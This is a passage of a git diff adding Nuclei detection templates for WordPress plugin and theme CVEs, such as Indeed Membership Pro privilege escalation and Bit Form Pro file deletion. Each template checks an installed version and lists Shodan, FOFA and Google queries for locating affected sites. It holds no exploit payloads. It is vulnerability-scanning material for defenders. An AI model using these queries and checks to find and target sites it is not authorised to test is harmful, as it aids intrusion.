tag names. This allows authenticated users, with editor-level permissions or greater to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, even when 'unfiltered_html' has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2023-0926 + metadata: + fofa-query: "wp-content/plugins/custom-permalinks/" + google-query: inurl:"/wp-content/plugins/custom-permalinks/" + shodan-query: 'vuln:CVE-2023-0926' + tags: cve,wordpress,wp-plugin,custom-permalinks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-permalinks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-permalinks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.0') \ No newline at end of file diff --git a/poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml b/poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml new file mode 100644 index 0000000000..c2de88fdfe --- /dev/null +++ b/poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6 + +info: + name: > + String Locator <= 2.6.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The String locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'sql-column' parameter in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This required WP_DEBUG to be enabled in order to be exploited. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/18e0140e-ac24-48c6-aea0-bb0da203a817?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-6987 + metadata: + fofa-query: "wp-content/plugins/string-locator/" + google-query: inurl:"/wp-content/plugins/string-locator/" + shodan-query: 'vuln:CVE-2023-6987' + tags: cve,wordpress,wp-plugin,string-locator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/string-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "string-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml b/poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml new file mode 100644 index 0000000000..e917e51ea4 --- /dev/null +++ b/poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-2254-fff7de08f6116735e0400b319113ddc3 + +info: + name: > + RT Easy Builder – Advanced addons for Elementor <= 2.2 - Authenticated (Contributor+) Stored Cross-site Scripting + author: topscoder + severity: low + description: > + The RT Easy Builder – Advanced addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5fb289e-bd38-42ea-86a4-7816b59bd0b2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-2254 + metadata: + fofa-query: "wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-2254' + tags: cve,wordpress,wp-plugin,rt-easy-builder-advanced-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rt-easy-builder-advanced-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-39666.yaml b/poc/cve/CVE-2024-39666.yaml new file mode 100644 index 0000000000..f541fecb0f --- /dev/null +++ b/poc/cve/CVE-2024-39666.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39666 + +info: + name: > + WooCommerce <= 9.1.2 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 9.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7ad4272c-75a1-4bc9-be3b-add80de45871?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-39666 + metadata: + fofa-query: "wp-content/plugins/woocommerce/" + google-query: inurl:"/wp-content/plugins/woocommerce/" + shodan-query: 'vuln:CVE-2024-39666' + tags: cve,wordpress,wp-plugin,woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4096-f7fc8238f9059dfbea1c3f48f5cc8e2e.yaml b/poc/cve/CVE-2024-4096-f7fc8238f9059dfbea1c3f48f5cc8e2e.yaml new file mode 100644 index 0000000000..46b10d7552 --- /dev/null +++ b/poc/cve/CVE-2024-4096-f7fc8238f9059dfbea1c3f48f5cc8e2e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-4096-f7fc8238f9059dfbea1c3f48f5cc8e2e + +info: + name: > + Responsive Tabs <= 4.0.10 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Responsive Tabs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'Tab' titles in all versions up to, and including, 4.0.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7c66fdab-d067-4043-a602-9bbe94962a00?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-4096 + metadata: + fofa-query: "wp-content/plugins/responsive-tabs/" + google-query: inurl:"/wp-content/plugins/responsive-tabs/" + shodan-query: 'vuln:CVE-2024-4096' + tags: cve,wordpress,wp-plugin,responsive-tabs,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/responsive-tabs/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "responsive-tabs" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.10') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43238.yaml b/poc/cve/CVE-2024-43238.yaml new file mode 100644 index 0000000000..fb9eb97cd6 --- /dev/null +++ b/poc/cve/CVE-2024-43238.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43238 + +info: + name: > + weMail <= 1.14.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The weMail plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.14.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/82e9bd78-726f-421f-8bf0-560fa9eeab2c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43238 + metadata: + fofa-query: "wp-content/plugins/wemail/" + google-query: inurl:"/wp-content/plugins/wemail/" + shodan-query: 'vuln:CVE-2024-43238' + tags: cve,wordpress,wp-plugin,wemail,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wemail/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wemail" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.14.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43239.yaml b/poc/cve/CVE-2024-43239.yaml new file mode 100644 index 0000000000..3b2edd7d69 --- /dev/null +++ b/poc/cve/CVE-2024-43239.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43239 + +info: + name: > + Masteriyo - LMS <= 1.11.4 - Authenticated (Student+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.11.4 due to missing validation on the 'course_id' user controlled key. This makes it possible for authenticated attackers, with student-level access and above, to review courses they don't have access to. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3d7a587-042d-4ba1-9373-aaeb24c711f5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43239 + metadata: + fofa-query: "wp-content/plugins/learning-management-system/" + google-query: inurl:"/wp-content/plugins/learning-management-system/" + shodan-query: 'vuln:CVE-2024-43239' + tags: cve,wordpress,wp-plugin,learning-management-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learning-management-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.11.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43240.yaml b/poc/cve/CVE-2024-43240.yaml new file mode 100644 index 0000000000..d3bbc9f1ae --- /dev/null +++ b/poc/cve/CVE-2024-43240.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43240 + +info: + name: > + Indeed Membership Pro <= 12.6 - Unauthenticated Privilege Escalation + author: topscoder + severity: critical + description: > + The Indeed Membership Pro plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 12.6. This is due to the plugin not properly restricting access to functionality that allows privilege assignment. This makes it possible for unauthenticated attackers to gain access to accounts that have higher privileges, such as administrator. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bb4a8ba-33f1-4183-be76-72f6a99fc1fa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43240 + metadata: + fofa-query: "wp-content/plugins/indeed-membership-pro/" + google-query: inurl:"/wp-content/plugins/indeed-membership-pro/" + shodan-query: 'vuln:CVE-2024-43240' + tags: cve,wordpress,wp-plugin,indeed-membership-pro,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-membership-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 12.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43241.yaml b/poc/cve/CVE-2024-43241.yaml new file mode 100644 index 0000000000..10bd8e03a5 --- /dev/null +++ b/poc/cve/CVE-2024-43241.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43241 + +info: + name: > + Indeed Membership Pro <= 12.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Indeed Membership Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 12.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b7dce0db-792f-4be2-a55d-b4fb7442b548?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43241 + metadata: + fofa-query: "wp-content/plugins/indeed-membership-pro/" + google-query: inurl:"/wp-content/plugins/indeed-membership-pro/" + shodan-query: 'vuln:CVE-2024-43241' + tags: cve,wordpress,wp-plugin,indeed-membership-pro,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-membership-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 12.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43242.yaml b/poc/cve/CVE-2024-43242.yaml new file mode 100644 index 0000000000..2ebc2357f7 --- /dev/null +++ b/poc/cve/CVE-2024-43242.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43242 + +info: + name: > + Indeed Membership Pro <= 12.6 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Indeed Membership Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 12.6 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/12f314c5-ba73-4204-b276-904d9de7c099?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-43242 + metadata: + fofa-query: "wp-content/plugins/indeed-membership-pro/" + google-query: inurl:"/wp-content/plugins/indeed-membership-pro/" + shodan-query: 'vuln:CVE-2024-43242' + tags: cve,wordpress,wp-plugin,indeed-membership-pro,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-membership-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 12.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43244.yaml b/poc/cve/CVE-2024-43244.yaml new file mode 100644 index 0000000000..f64390a330 --- /dev/null +++ b/poc/cve/CVE-2024-43244.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43244 + +info: + name: > + Houzez <= 3.2.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Houzez theme for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ceaa52e-564d-4454-8e3b-dc6899c910dd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43244 + metadata: + fofa-query: "wp-content/themes/houzez/" + google-query: inurl:"/wp-content/themes/houzez/" + shodan-query: 'vuln:CVE-2024-43244' + tags: cve,wordpress,wp-theme,houzez,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/houzez/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "houzez" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43245.yaml b/poc/cve/CVE-2024-43245.yaml new file mode 100644 index 0000000000..b717f875f6 --- /dev/null +++ b/poc/cve/CVE-2024-43245.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43245 + +info: + name: > + JobSearch <= 2.3.4 - Authentication Bypass to Account Takeover + author: topscoder + severity: critical + description: > + The JobSearch WP Job Board plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.3.4. This is due to the plugin not properly validating identity on login functionality. This makes it possible for unauthenticated attackers to gain access to accounts they should not have access to. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7250da0a-1ac6-48a6-a480-0721d604add3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43245 + metadata: + fofa-query: "wp-content/plugins/wp-jobsearch/" + google-query: inurl:"/wp-content/plugins/wp-jobsearch/" + shodan-query: 'vuln:CVE-2024-43245' + tags: cve,wordpress,wp-plugin,wp-jobsearch,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-jobsearch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-jobsearch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43246.yaml b/poc/cve/CVE-2024-43246.yaml new file mode 100644 index 0000000000..1f23add1fc --- /dev/null +++ b/poc/cve/CVE-2024-43246.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43246 + +info: + name: > + WHMpress <= 6.2-revision-5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WHMpress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 6.2-revision-5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5dea4293-0496-4cee-9d8a-c15beaa51b14?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43246 + metadata: + fofa-query: "wp-content/plugins/whmpress/" + google-query: inurl:"/wp-content/plugins/whmpress/" + shodan-query: 'vuln:CVE-2024-43246' + tags: cve,wordpress,wp-plugin,whmpress,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "whmpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.2-revision-5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43247.yaml b/poc/cve/CVE-2024-43247.yaml new file mode 100644 index 0000000000..2d5b1f65cc --- /dev/null +++ b/poc/cve/CVE-2024-43247.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43247 + +info: + name: > + WHMpress <= 6.2-revision-5 - Missing Authorization to Authenticated (Subscriber+) Settings Update + author: topscoder + severity: low + description: > + The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 6.2-revision-5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d264e88-7137-48ff-8ce3-5fff77e2474a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43247 + metadata: + fofa-query: "wp-content/plugins/whmpress/" + google-query: inurl:"/wp-content/plugins/whmpress/" + shodan-query: 'vuln:CVE-2024-43247' + tags: cve,wordpress,wp-plugin,whmpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "whmpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.2-revision-5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43248.yaml b/poc/cve/CVE-2024-43248.yaml new file mode 100644 index 0000000000..7066b82ae1 --- /dev/null +++ b/poc/cve/CVE-2024-43248.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43248 + +info: + name: > + Bit Form Pro <= 2.6.4 - Unauthenticated Arbitrary File Deletion + author: topscoder + severity: critical + description: > + The Bit Form Pro plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in all versions up to, and including, 2.6.4. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7a09288c-b8de-4674-9f96-d26ff3c7d917?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43248 + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:CVE-2024-43248' + tags: cve,wordpress,wp-plugin,bitformpro,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43249.yaml b/poc/cve/CVE-2024-43249.yaml new file mode 100644 index 0000000000..f908d9cdb8 --- /dev/null +++ b/poc/cve/CVE-2024-43249.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43249 + +info: + name: > + Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The Bit Form Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6d3b9d15-f6a9-4d1c-ada5-8c48add839a2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43249 + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:CVE-2024-43249' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43250.yaml b/poc/cve/CVE-2024-43250.yaml new file mode 100644 index 0000000000..149e9593cf --- /dev/null +++ b/poc/cve/CVE-2024-43250.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43250 + +info: + name: > + Bit Form Pro <= 2.6.4 - Missing Authorization to Authenticated (Subscriber+) Settings Update + author: topscoder + severity: low + description: > + The Bit Form Pro plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/525a2180-3643-4f78-aafd-99a546bac363?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43250 + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:CVE-2024-43250' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43251.yaml b/poc/cve/CVE-2024-43251.yaml new file mode 100644 index 0000000000..64219453b6 --- /dev/null +++ b/poc/cve/CVE-2024-43251.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43251 + 